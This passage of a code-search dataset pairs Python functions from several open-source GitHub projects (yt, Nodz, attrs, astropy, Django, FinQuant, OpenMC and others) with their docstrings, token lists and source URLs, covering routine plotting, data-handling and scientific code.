get the transform type of a field.
Parameters
----------
field : string
the field to get a transform
if field == 'all', applies to all plots.
|
get the transform type of a field.
|
[
"get",
"the",
"transform",
"type",
"of",
"a",
"field",
"."
] |
def get_log(self, field):
"""get the transform type of a field.
Parameters
----------
field : string
the field to get a transform
if field == 'all', applies to all plots.
"""
# devnote : accepts_all_fields decorator is not applicable here because
# the return variable isn't self
log = {}
if field == "all":
fields = list(self.plots.keys())
else:
fields = field
for field in self.data_source._determine_fields(fields):
log[field] = self._field_transform[field] == log_transform
return log
|
[
"def",
"get_log",
"(",
"self",
",",
"field",
")",
":",
"# devnote : accepts_all_fields decorator is not applicable here because",
"# the return variable isn't self",
"log",
"=",
"{",
"}",
"if",
"field",
"==",
"\"all\"",
":",
"fields",
"=",
"list",
"(",
"self",
".",
"plots",
".",
"keys",
"(",
")",
")",
"else",
":",
"fields",
"=",
"field",
"for",
"field",
"in",
"self",
".",
"data_source",
".",
"_determine_fields",
"(",
"fields",
")",
":",
"log",
"[",
"field",
"]",
"=",
"self",
".",
"_field_transform",
"[",
"field",
"]",
"==",
"log_transform",
"return",
"log"
] |
https://github.com/yt-project/yt/blob/dc7b24f9b266703db4c843e329c6c8644d47b824/yt/visualization/plot_container.py#L316-L335
|
|
LeGoffLoic/Nodz
|
0ee255c62883f7a374a9de6cbcf555e3352e5dec
|
nodz_main.py
|
python
|
SlotItem.paint
|
(self, painter, option, widget)
|
Paint the Slot.
|
Paint the Slot.
|
[
"Paint",
"the",
"Slot",
"."
] |
def paint(self, painter, option, widget):
"""
Paint the Slot.
"""
painter.setBrush(self.brush)
painter.setPen(self.pen)
nodzInst = self.scene().views()[0]
config = nodzInst.config
if nodzInst.drawingConnection:
if self.parentItem() == nodzInst.currentHoveredNode:
painter.setBrush(utils._convertDataToColor(config['non_connectable_color']))
if (self.slotType == nodzInst.sourceSlot.slotType or (self.slotType != nodzInst.sourceSlot.slotType and self.dataType != nodzInst.sourceSlot.dataType)):
painter.setBrush(utils._convertDataToColor(config['non_connectable_color']))
else:
_penValid = QtGui.QPen()
_penValid.setStyle(QtCore.Qt.SolidLine)
_penValid.setWidth(2)
_penValid.setColor(QtGui.QColor(255, 255, 255, 255))
painter.setPen(_penValid)
painter.setBrush(self.brush)
painter.drawEllipse(self.boundingRect())
|
[
"def",
"paint",
"(",
"self",
",",
"painter",
",",
"option",
",",
"widget",
")",
":",
"painter",
".",
"setBrush",
"(",
"self",
".",
"brush",
")",
"painter",
".",
"setPen",
"(",
"self",
".",
"pen",
")",
"nodzInst",
"=",
"self",
".",
"scene",
"(",
")",
".",
"views",
"(",
")",
"[",
"0",
"]",
"config",
"=",
"nodzInst",
".",
"config",
"if",
"nodzInst",
".",
"drawingConnection",
":",
"if",
"self",
".",
"parentItem",
"(",
")",
"==",
"nodzInst",
".",
"currentHoveredNode",
":",
"painter",
".",
"setBrush",
"(",
"utils",
".",
"_convertDataToColor",
"(",
"config",
"[",
"'non_connectable_color'",
"]",
")",
")",
"if",
"(",
"self",
".",
"slotType",
"==",
"nodzInst",
".",
"sourceSlot",
".",
"slotType",
"or",
"(",
"self",
".",
"slotType",
"!=",
"nodzInst",
".",
"sourceSlot",
".",
"slotType",
"and",
"self",
".",
"dataType",
"!=",
"nodzInst",
".",
"sourceSlot",
".",
"dataType",
")",
")",
":",
"painter",
".",
"setBrush",
"(",
"utils",
".",
"_convertDataToColor",
"(",
"config",
"[",
"'non_connectable_color'",
"]",
")",
")",
"else",
":",
"_penValid",
"=",
"QtGui",
".",
"QPen",
"(",
")",
"_penValid",
".",
"setStyle",
"(",
"QtCore",
".",
"Qt",
".",
"SolidLine",
")",
"_penValid",
".",
"setWidth",
"(",
"2",
")",
"_penValid",
".",
"setColor",
"(",
"QtGui",
".",
"QColor",
"(",
"255",
",",
"255",
",",
"255",
",",
"255",
")",
")",
"painter",
".",
"setPen",
"(",
"_penValid",
")",
"painter",
".",
"setBrush",
"(",
"self",
".",
"brush",
")",
"painter",
".",
"drawEllipse",
"(",
"self",
".",
"boundingRect",
"(",
")",
")"
] |
https://github.com/LeGoffLoic/Nodz/blob/0ee255c62883f7a374a9de6cbcf555e3352e5dec/nodz_main.py#L1672-L1695
|
||
wistbean/learn_python3_spider
|
73c873f4845f4385f097e5057407d03dd37a117b
|
stackoverflow/venv/lib/python3.6/site-packages/attr/_funcs.py
|
python
|
has
|
(cls)
|
return getattr(cls, "__attrs_attrs__", None) is not None
|
Check whether *cls* is a class with ``attrs`` attributes.
:param type cls: Class to introspect.
:raise TypeError: If *cls* is not a class.
:rtype: bool
|
Check whether *cls* is a class with ``attrs`` attributes.
|
[
"Check",
"whether",
"*",
"cls",
"*",
"is",
"a",
"class",
"with",
"attrs",
"attributes",
"."
] |
def has(cls):
"""
Check whether *cls* is a class with ``attrs`` attributes.
:param type cls: Class to introspect.
:raise TypeError: If *cls* is not a class.
:rtype: bool
"""
return getattr(cls, "__attrs_attrs__", None) is not None
|
[
"def",
"has",
"(",
"cls",
")",
":",
"return",
"getattr",
"(",
"cls",
",",
"\"__attrs_attrs__\"",
",",
"None",
")",
"is",
"not",
"None"
] |
https://github.com/wistbean/learn_python3_spider/blob/73c873f4845f4385f097e5057407d03dd37a117b/stackoverflow/venv/lib/python3.6/site-packages/attr/_funcs.py#L215-L224
|
|
holzschu/Carnets
|
44effb10ddfc6aa5c8b0687582a724ba82c6b547
|
Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/utils/iers/iers.py
|
python
|
LeapSeconds.from_erfa
|
(cls, built_in=False)
|
Create table from the leap-second list in ERFA.
Parameters
----------
built_in : bool
If `False` (default), retrieve the list currently used by ERFA,
which may have been updated. If `True`, retrieve the list shipped
with erfa.
|
Create table from the leap-second list in ERFA.
|
[
"Create",
"table",
"from",
"the",
"leap",
"-",
"second",
"list",
"in",
"ERFA",
"."
] |
def from_erfa(cls, built_in=False):
"""Create table from the leap-second list in ERFA.
Parameters
----------
built_in : bool
If `False` (default), retrieve the list currently used by ERFA,
which may have been updated. If `True`, retrieve the list shipped
with erfa.
"""
current = cls(erfa.leap_seconds.get())
current._expires = Time('{0.year:04d}-{0.month:02d}-{0.day:02d}'
.format(erfa.leap_seconds.expires),
scale='tai')
if not built_in:
return current
try:
erfa.leap_seconds.set(None) # reset to defaults
return cls.from_erfa(built_in=False)
finally:
erfa.leap_seconds.set(current)
|
[
"def",
"from_erfa",
"(",
"cls",
",",
"built_in",
"=",
"False",
")",
":",
"current",
"=",
"cls",
"(",
"erfa",
".",
"leap_seconds",
".",
"get",
"(",
")",
")",
"current",
".",
"_expires",
"=",
"Time",
"(",
"'{0.year:04d}-{0.month:02d}-{0.day:02d}'",
".",
"format",
"(",
"erfa",
".",
"leap_seconds",
".",
"expires",
")",
",",
"scale",
"=",
"'tai'",
")",
"if",
"not",
"built_in",
":",
"return",
"current",
"try",
":",
"erfa",
".",
"leap_seconds",
".",
"set",
"(",
"None",
")",
"# reset to defaults",
"return",
"cls",
".",
"from_erfa",
"(",
"built_in",
"=",
"False",
")",
"finally",
":",
"erfa",
".",
"leap_seconds",
".",
"set",
"(",
"current",
")"
] |
https://github.com/holzschu/Carnets/blob/44effb10ddfc6aa5c8b0687582a724ba82c6b547/Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/utils/iers/iers.py#L1100-L1121
|
||
sangwoomo/instagan
|
f9c1d9c9b7d2c21491317921f24a5200a02a823d
|
models/cycle_gan_model.py
|
python
|
CycleGANModel.initialize
|
(self, opt)
|
[] |
def initialize(self, opt):
BaseModel.initialize(self, opt)
# specify the training losses you want to print out. The program will call base_model.get_current_losses
self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']
# specify the images you want to save/display. The program will call base_model.get_current_visuals
visual_names_A = ['real_A', 'fake_B', 'rec_A']
visual_names_B = ['real_B', 'fake_A', 'rec_B']
if self.isTrain and self.opt.lambda_identity > 0.0:
visual_names_A.append('idt_A')
visual_names_B.append('idt_B')
self.visual_names = visual_names_A + visual_names_B
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
if self.isTrain:
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
else: # during test time, only load Gs
self.model_names = ['G_A', 'G_B']
# load/define networks
# The naming conversion is different from those used in the paper
# Code (paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)
self.netG_A = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
self.netG_B = networks.define_G(opt.output_nc, opt.input_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain:
use_sigmoid = opt.no_lsgan
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, use_sigmoid, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, use_sigmoid, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain:
self.fake_A_pool = ImagePool(opt.pool_size)
self.fake_B_pool = ImagePool(opt.pool_size)
# define loss functions
self.criterionGAN = networks.GANLoss(use_lsgan=not opt.no_lsgan).to(self.device)
self.criterionCycle = torch.nn.L1Loss()
self.criterionIdt = torch.nn.L1Loss()
# initialize optimizers
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers = []
self.optimizers.append(self.optimizer_G)
self.optimizers.append(self.optimizer_D)
|
[
"def",
"initialize",
"(",
"self",
",",
"opt",
")",
":",
"BaseModel",
".",
"initialize",
"(",
"self",
",",
"opt",
")",
"# specify the training losses you want to print out. The program will call base_model.get_current_losses",
"self",
".",
"loss_names",
"=",
"[",
"'D_A'",
",",
"'G_A'",
",",
"'cycle_A'",
",",
"'idt_A'",
",",
"'D_B'",
",",
"'G_B'",
",",
"'cycle_B'",
",",
"'idt_B'",
"]",
"# specify the images you want to save/display. The program will call base_model.get_current_visuals",
"visual_names_A",
"=",
"[",
"'real_A'",
",",
"'fake_B'",
",",
"'rec_A'",
"]",
"visual_names_B",
"=",
"[",
"'real_B'",
",",
"'fake_A'",
",",
"'rec_B'",
"]",
"if",
"self",
".",
"isTrain",
"and",
"self",
".",
"opt",
".",
"lambda_identity",
">",
"0.0",
":",
"visual_names_A",
".",
"append",
"(",
"'idt_A'",
")",
"visual_names_B",
".",
"append",
"(",
"'idt_B'",
")",
"self",
".",
"visual_names",
"=",
"visual_names_A",
"+",
"visual_names_B",
"# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks",
"if",
"self",
".",
"isTrain",
":",
"self",
".",
"model_names",
"=",
"[",
"'G_A'",
",",
"'G_B'",
",",
"'D_A'",
",",
"'D_B'",
"]",
"else",
":",
"# during test time, only load Gs",
"self",
".",
"model_names",
"=",
"[",
"'G_A'",
",",
"'G_B'",
"]",
"# load/define networks",
"# The naming conversion is different from those used in the paper",
"# Code (paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)",
"self",
".",
"netG_A",
"=",
"networks",
".",
"define_G",
"(",
"opt",
".",
"input_nc",
",",
"opt",
".",
"output_nc",
",",
"opt",
".",
"ngf",
",",
"opt",
".",
"netG",
",",
"opt",
".",
"norm",
",",
"not",
"opt",
".",
"no_dropout",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"self",
".",
"netG_B",
"=",
"networks",
".",
"define_G",
"(",
"opt",
".",
"output_nc",
",",
"opt",
".",
"input_nc",
",",
"opt",
".",
"ngf",
",",
"opt",
".",
"netG",
",",
"opt",
".",
"norm",
",",
"not",
"opt",
".",
"no_dropout",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"if",
"self",
".",
"isTrain",
":",
"use_sigmoid",
"=",
"opt",
".",
"no_lsgan",
"self",
".",
"netD_A",
"=",
"networks",
".",
"define_D",
"(",
"opt",
".",
"output_nc",
",",
"opt",
".",
"ndf",
",",
"opt",
".",
"netD",
",",
"opt",
".",
"n_layers_D",
",",
"opt",
".",
"norm",
",",
"use_sigmoid",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"self",
".",
"netD_B",
"=",
"networks",
".",
"define_D",
"(",
"opt",
".",
"input_nc",
",",
"opt",
".",
"ndf",
",",
"opt",
".",
"netD",
",",
"opt",
".",
"n_layers_D",
",",
"opt",
".",
"norm",
",",
"use_sigmoid",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"if",
"self",
".",
"isTrain",
":",
"self",
".",
"fake_A_pool",
"=",
"ImagePool",
"(",
"opt",
".",
"pool_size",
")",
"self",
".",
"fake_B_pool",
"=",
"ImagePool",
"(",
"opt",
".",
"pool_size",
")",
"# define loss functions",
"self",
".",
"criterionGAN",
"=",
"networks",
".",
"GANLoss",
"(",
"use_lsgan",
"=",
"not",
"opt",
".",
"no_lsgan",
")",
".",
"to",
"(",
"self",
".",
"device",
")",
"self",
".",
"criterionCycle",
"=",
"torch",
".",
"nn",
".",
"L1Loss",
"(",
")",
"self",
".",
"criterionIdt",
"=",
"torch",
".",
"nn",
".",
"L1Loss",
"(",
")",
"# initialize optimizers",
"self",
".",
"optimizer_G",
"=",
"torch",
".",
"optim",
".",
"Adam",
"(",
"itertools",
".",
"chain",
"(",
"self",
".",
"netG_A",
".",
"parameters",
"(",
")",
",",
"self",
".",
"netG_B",
".",
"parameters",
"(",
")",
")",
",",
"lr",
"=",
"opt",
".",
"lr",
",",
"betas",
"=",
"(",
"opt",
".",
"beta1",
",",
"0.999",
")",
")",
"self",
".",
"optimizer_D",
"=",
"torch",
".",
"optim",
".",
"Adam",
"(",
"itertools",
".",
"chain",
"(",
"self",
".",
"netD_A",
".",
"parameters",
"(",
")",
",",
"self",
".",
"netD_B",
".",
"parameters",
"(",
")",
")",
",",
"lr",
"=",
"opt",
".",
"lr",
",",
"betas",
"=",
"(",
"opt",
".",
"beta1",
",",
"0.999",
")",
")",
"self",
".",
"optimizers",
"=",
"[",
"]",
"self",
".",
"optimizers",
".",
"append",
"(",
"self",
".",
"optimizer_G",
")",
"self",
".",
"optimizers",
".",
"append",
"(",
"self",
".",
"optimizer_D",
")"
] |
https://github.com/sangwoomo/instagan/blob/f9c1d9c9b7d2c21491317921f24a5200a02a823d/models/cycle_gan_model.py#L23-L71
|
||||
JaniceWuo/MovieRecommend
|
4c86db64ca45598917d304f535413df3bc9fea65
|
movierecommend/venv1/Lib/site-packages/django/db/backends/base/schema.py
|
python
|
BaseDatabaseSchemaEditor.alter_index_together
|
(self, model, old_index_together, new_index_together)
|
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
|
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
|
[
"Deals",
"with",
"a",
"model",
"changing",
"its",
"index_together",
".",
"Note",
":",
"The",
"input",
"index_togethers",
"must",
"be",
"doubly",
"-",
"nested",
"not",
"the",
"single",
"-",
"nested",
"[",
"foo",
"bar",
"]",
"format",
"."
] |
def alter_index_together(self, model, old_index_together, new_index_together):
"""
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
olds = set(tuple(fields) for fields in old_index_together)
news = set(tuple(fields) for fields in new_index_together)
# Deleted indexes
for fields in olds.difference(news):
self._delete_composed_index(model, fields, {'index': True}, self.sql_delete_index)
# Created indexes
for field_names in news.difference(olds):
fields = [model._meta.get_field(field) for field in field_names]
self.execute(self._create_index_sql(model, fields, suffix="_idx"))
|
[
"def",
"alter_index_together",
"(",
"self",
",",
"model",
",",
"old_index_together",
",",
"new_index_together",
")",
":",
"olds",
"=",
"set",
"(",
"tuple",
"(",
"fields",
")",
"for",
"fields",
"in",
"old_index_together",
")",
"news",
"=",
"set",
"(",
"tuple",
"(",
"fields",
")",
"for",
"fields",
"in",
"new_index_together",
")",
"# Deleted indexes",
"for",
"fields",
"in",
"olds",
".",
"difference",
"(",
"news",
")",
":",
"self",
".",
"_delete_composed_index",
"(",
"model",
",",
"fields",
",",
"{",
"'index'",
":",
"True",
"}",
",",
"self",
".",
"sql_delete_index",
")",
"# Created indexes",
"for",
"field_names",
"in",
"news",
".",
"difference",
"(",
"olds",
")",
":",
"fields",
"=",
"[",
"model",
".",
"_meta",
".",
"get_field",
"(",
"field",
")",
"for",
"field",
"in",
"field_names",
"]",
"self",
".",
"execute",
"(",
"self",
".",
"_create_index_sql",
"(",
"model",
",",
"fields",
",",
"suffix",
"=",
"\"_idx\"",
")",
")"
] |
https://github.com/JaniceWuo/MovieRecommend/blob/4c86db64ca45598917d304f535413df3bc9fea65/movierecommend/venv1/Lib/site-packages/django/db/backends/base/schema.py#L355-L369
|
||
tomplus/kubernetes_asyncio
|
f028cc793e3a2c519be6a52a49fb77ff0b014c9b
|
kubernetes_asyncio/client/models/v1_endpoint_port.py
|
python
|
V1EndpointPort.name
|
(self)
|
return self._name
|
Gets the name of this V1EndpointPort. # noqa: E501
The name of this port. This must match the 'name' field in the corresponding ServicePort. Must be a DNS_LABEL. Optional only if one port is defined. # noqa: E501
:return: The name of this V1EndpointPort. # noqa: E501
:rtype: str
|
Gets the name of this V1EndpointPort. # noqa: E501
|
[
"Gets",
"the",
"name",
"of",
"this",
"V1EndpointPort",
".",
"#",
"noqa",
":",
"E501"
] |
def name(self):
"""Gets the name of this V1EndpointPort. # noqa: E501
The name of this port. This must match the 'name' field in the corresponding ServicePort. Must be a DNS_LABEL. Optional only if one port is defined. # noqa: E501
:return: The name of this V1EndpointPort. # noqa: E501
:rtype: str
"""
return self._name
|
[
"def",
"name",
"(",
"self",
")",
":",
"return",
"self",
".",
"_name"
] |
https://github.com/tomplus/kubernetes_asyncio/blob/f028cc793e3a2c519be6a52a49fb77ff0b014c9b/kubernetes_asyncio/client/models/v1_endpoint_port.py#L93-L101
|
|
fmilthaler/FinQuant
|
38a2884663eea228540abd094b5c163f96c55aff
|
finquant/moving_average.py
|
python
|
compute_ma
|
(data, fun, spans, plot=True)
|
return ma
|
Computes a band of moving averages (sma or ema, depends on the input argument
`fun`) for a number of different time windows. If `plot` is `True`, it also
computes and sets markers for buy/sell signals based on crossovers of the Moving
Averages with the shortest/longest spans.
:Input:
:data: pandas.DataFrame with stock prices, only one column is expected.
:fun: function that computes a moving average, e.g. sma (simple) or
ema (exponential).
:spans: list of integers, time windows to compute the Moving Average on.
:plot: boolean (default: True), whether to plot the moving averages
and buy/sell signales based on crossovers of shortest and longest
moving average.
:Output:
:ma: pandas.DataFrame with moving averages of given data.
|
Computes a band of moving averages (sma or ema, depends on the input argument
`fun`) for a number of different time windows. If `plot` is `True`, it also
computes and sets markers for buy/sell signals based on crossovers of the Moving
Averages with the shortest/longest spans.
|
[
"Computes",
"a",
"band",
"of",
"moving",
"averages",
"(",
"sma",
"or",
"ema",
"depends",
"on",
"the",
"input",
"argument",
"fun",
")",
"for",
"a",
"number",
"of",
"different",
"time",
"windows",
".",
"If",
"plot",
"is",
"True",
"it",
"also",
"computes",
"and",
"sets",
"markers",
"for",
"buy",
"/",
"sell",
"signals",
"based",
"on",
"crossovers",
"of",
"the",
"Moving",
"Averages",
"with",
"the",
"shortest",
"/",
"longest",
"spans",
"."
] |
def compute_ma(data, fun, spans, plot=True):
"""Computes a band of moving averages (sma or ema, depends on the input argument
`fun`) for a number of different time windows. If `plot` is `True`, it also
computes and sets markers for buy/sell signals based on crossovers of the Moving
Averages with the shortest/longest spans.
:Input:
:data: pandas.DataFrame with stock prices, only one column is expected.
:fun: function that computes a moving average, e.g. sma (simple) or
ema (exponential).
:spans: list of integers, time windows to compute the Moving Average on.
:plot: boolean (default: True), whether to plot the moving averages
and buy/sell signales based on crossovers of shortest and longest
moving average.
:Output:
:ma: pandas.DataFrame with moving averages of given data.
"""
if not isinstance(data, pd.DataFrame):
raise ValueError("data must be of type pandas.DataFrame")
# compute moving averages
ma = data.copy(deep=True)
for span in spans:
ma[str(span) + "d"] = fun(data, span=span)
if plot:
fig = plt.figure()
ax = fig.add_subplot(111)
# plot moving averages
ma.plot(ax=ax)
# Create buy/sell signals of shortest and longest span
minspan = min(spans)
minlabel = str(minspan) + "d"
maxspan = max(spans)
maxlabel = str(maxspan) + "d"
signals = ma.copy(deep=True)
signals["diff"] = 0.0
signals["diff"][minspan:] = np.where(
ma[minlabel][minspan:] > ma[maxlabel][minspan:], 1.0, 0.0
)
# Generate trading orders
signals["signal"] = signals["diff"].diff()
# marker for buy signal
ax.plot(
signals.loc[signals["signal"] == 1.0].index.values,
signals[minlabel][signals["signal"] == 1.0].values,
marker="^",
markersize=10,
color="r",
label="buy signal",
)
# marker for sell signal
ax.plot(
signals.loc[signals["signal"] == -1.0].index.values,
signals[minlabel][signals["signal"] == -1.0].values,
marker="v",
markersize=10,
color="b",
label="sell signal",
)
# title
title = "Band of Moving Averages (" + str(fun.__name__) + ")"
plt.title(title)
# legend
plt.legend(ncol=2)
# axis labels
plt.xlabel(data.index.name)
plt.ylabel("Price")
return ma
|
[
"def",
"compute_ma",
"(",
"data",
",",
"fun",
",",
"spans",
",",
"plot",
"=",
"True",
")",
":",
"if",
"not",
"isinstance",
"(",
"data",
",",
"pd",
".",
"DataFrame",
")",
":",
"raise",
"ValueError",
"(",
"\"data must be of type pandas.DataFrame\"",
")",
"# compute moving averages",
"ma",
"=",
"data",
".",
"copy",
"(",
"deep",
"=",
"True",
")",
"for",
"span",
"in",
"spans",
":",
"ma",
"[",
"str",
"(",
"span",
")",
"+",
"\"d\"",
"]",
"=",
"fun",
"(",
"data",
",",
"span",
"=",
"span",
")",
"if",
"plot",
":",
"fig",
"=",
"plt",
".",
"figure",
"(",
")",
"ax",
"=",
"fig",
".",
"add_subplot",
"(",
"111",
")",
"# plot moving averages",
"ma",
".",
"plot",
"(",
"ax",
"=",
"ax",
")",
"# Create buy/sell signals of shortest and longest span",
"minspan",
"=",
"min",
"(",
"spans",
")",
"minlabel",
"=",
"str",
"(",
"minspan",
")",
"+",
"\"d\"",
"maxspan",
"=",
"max",
"(",
"spans",
")",
"maxlabel",
"=",
"str",
"(",
"maxspan",
")",
"+",
"\"d\"",
"signals",
"=",
"ma",
".",
"copy",
"(",
"deep",
"=",
"True",
")",
"signals",
"[",
"\"diff\"",
"]",
"=",
"0.0",
"signals",
"[",
"\"diff\"",
"]",
"[",
"minspan",
":",
"]",
"=",
"np",
".",
"where",
"(",
"ma",
"[",
"minlabel",
"]",
"[",
"minspan",
":",
"]",
">",
"ma",
"[",
"maxlabel",
"]",
"[",
"minspan",
":",
"]",
",",
"1.0",
",",
"0.0",
")",
"# Generate trading orders",
"signals",
"[",
"\"signal\"",
"]",
"=",
"signals",
"[",
"\"diff\"",
"]",
".",
"diff",
"(",
")",
"# marker for buy signal",
"ax",
".",
"plot",
"(",
"signals",
".",
"loc",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"1.0",
"]",
".",
"index",
".",
"values",
",",
"signals",
"[",
"minlabel",
"]",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"1.0",
"]",
".",
"values",
",",
"marker",
"=",
"\"^\"",
",",
"markersize",
"=",
"10",
",",
"color",
"=",
"\"r\"",
",",
"label",
"=",
"\"buy signal\"",
",",
")",
"# marker for sell signal",
"ax",
".",
"plot",
"(",
"signals",
".",
"loc",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"-",
"1.0",
"]",
".",
"index",
".",
"values",
",",
"signals",
"[",
"minlabel",
"]",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"-",
"1.0",
"]",
".",
"values",
",",
"marker",
"=",
"\"v\"",
",",
"markersize",
"=",
"10",
",",
"color",
"=",
"\"b\"",
",",
"label",
"=",
"\"sell signal\"",
",",
")",
"# title",
"title",
"=",
"\"Band of Moving Averages (\"",
"+",
"str",
"(",
"fun",
".",
"__name__",
")",
"+",
"\")\"",
"plt",
".",
"title",
"(",
"title",
")",
"# legend",
"plt",
".",
"legend",
"(",
"ncol",
"=",
"2",
")",
"# axis labels",
"plt",
".",
"xlabel",
"(",
"data",
".",
"index",
".",
"name",
")",
"plt",
".",
"ylabel",
"(",
"\"Price\"",
")",
"return",
"ma"
] |
https://github.com/fmilthaler/FinQuant/blob/38a2884663eea228540abd094b5c163f96c55aff/finquant/moving_average.py#L15-L82
|
|
openmc-dev/openmc
|
0cf7d9283786677e324bfbdd0984a54d1c86dacc
|
openmc/data/reaction.py
|
python
|
_get_photon_products_endf
|
(ev, rx)
|
return products
|
Generate photon products from an ENDF evaluation
Parameters
----------
ev : openmc.data.endf.Evaluation
ENDF evaluation to read from
rx : openmc.data.Reaction
Reaction that generates photons
Returns
-------
products : list of openmc.Products
Photons produced from reaction with given MT
|
Generate photon products from an ENDF evaluation
|
[
"Generate",
"photon",
"products",
"from",
"an",
"ENDF",
"evaluation"
] |
def _get_photon_products_endf(ev, rx):
"""Generate photon products from an ENDF evaluation
Parameters
----------
ev : openmc.data.endf.Evaluation
ENDF evaluation to read from
rx : openmc.data.Reaction
Reaction that generates photons
Returns
-------
products : list of openmc.Products
Photons produced from reaction with given MT
"""
products = []
if (12, rx.mt) in ev.section:
file_obj = StringIO(ev.section[12, rx.mt])
items = get_head_record(file_obj)
option = items[2]
if option == 1:
# Multiplicities given
n_discrete_photon = items[4]
if n_discrete_photon > 1:
items, total_yield = get_tab1_record(file_obj)
for k in range(n_discrete_photon):
photon = Product('photon')
# Get photon yield
items, photon.yield_ = get_tab1_record(file_obj)
# Get photon energy distribution
law = items[3]
dist = UncorrelatedAngleEnergy()
if law == 1:
# TODO: Get file 15 distribution
pass
elif law == 2:
energy = items[0]
primary_flag = items[2]
dist.energy = DiscretePhoton(primary_flag, energy,
ev.target['mass'])
photon.distribution.append(dist)
products.append(photon)
elif option == 2:
# Transition probability arrays given
ppyield = {}
ppyield['type'] = 'transition'
ppyield['transition'] = transition = {}
# Determine whether simple (LG=1) or complex (LG=2) transitions
lg = items[3]
# Get transition data
items, values = get_list_record(file_obj)
transition['energy_start'] = items[0]
transition['energies'] = np.array(values[::lg + 1])
transition['direct_probability'] = np.array(values[1::lg + 1])
if lg == 2:
# Complex case
transition['conditional_probability'] = np.array(
values[2::lg + 1])
elif (13, rx.mt) in ev.section:
file_obj = StringIO(ev.section[13, rx.mt])
# Determine option
items = get_head_record(file_obj)
n_discrete_photon = items[4]
if n_discrete_photon > 1:
items, total_xs = get_tab1_record(file_obj)
for k in range(n_discrete_photon):
photon = Product('photon')
items, xs = get_tab1_record(file_obj)
# Re-interpolate photon production cross section and neutron cross
# section to union energy grid
energy = np.union1d(xs.x, rx.xs['0K'].x)
photon_prod_xs = xs(energy)
neutron_xs = rx.xs['0K'](energy)
idx = np.where(neutron_xs > 0)
# Calculate yield as ratio
yield_ = np.zeros_like(energy)
yield_[idx] = photon_prod_xs[idx] / neutron_xs[idx]
photon.yield_ = Tabulated1D(energy, yield_)
# Get photon energy distribution
law = items[3]
dist = UncorrelatedAngleEnergy()
if law == 1:
# TODO: Get file 15 distribution
pass
elif law == 2:
energy = items[1]
primary_flag = items[2]
dist.energy = DiscretePhoton(primary_flag, energy,
ev.target['mass'])
photon.distribution.append(dist)
products.append(photon)
return products
|
[
"def",
"_get_photon_products_endf",
"(",
"ev",
",",
"rx",
")",
":",
"products",
"=",
"[",
"]",
"if",
"(",
"12",
",",
"rx",
".",
"mt",
")",
"in",
"ev",
".",
"section",
":",
"file_obj",
"=",
"StringIO",
"(",
"ev",
".",
"section",
"[",
"12",
",",
"rx",
".",
"mt",
"]",
")",
"items",
"=",
"get_head_record",
"(",
"file_obj",
")",
"option",
"=",
"items",
"[",
"2",
"]",
"if",
"option",
"==",
"1",
":",
"# Multiplicities given",
"n_discrete_photon",
"=",
"items",
"[",
"4",
"]",
"if",
"n_discrete_photon",
">",
"1",
":",
"items",
",",
"total_yield",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"for",
"k",
"in",
"range",
"(",
"n_discrete_photon",
")",
":",
"photon",
"=",
"Product",
"(",
"'photon'",
")",
"# Get photon yield",
"items",
",",
"photon",
".",
"yield_",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"# Get photon energy distribution",
"law",
"=",
"items",
"[",
"3",
"]",
"dist",
"=",
"UncorrelatedAngleEnergy",
"(",
")",
"if",
"law",
"==",
"1",
":",
"# TODO: Get file 15 distribution",
"pass",
"elif",
"law",
"==",
"2",
":",
"energy",
"=",
"items",
"[",
"0",
"]",
"primary_flag",
"=",
"items",
"[",
"2",
"]",
"dist",
".",
"energy",
"=",
"DiscretePhoton",
"(",
"primary_flag",
",",
"energy",
",",
"ev",
".",
"target",
"[",
"'mass'",
"]",
")",
"photon",
".",
"distribution",
".",
"append",
"(",
"dist",
")",
"products",
".",
"append",
"(",
"photon",
")",
"elif",
"option",
"==",
"2",
":",
"# Transition probability arrays given",
"ppyield",
"=",
"{",
"}",
"ppyield",
"[",
"'type'",
"]",
"=",
"'transition'",
"ppyield",
"[",
"'transition'",
"]",
"=",
"transition",
"=",
"{",
"}",
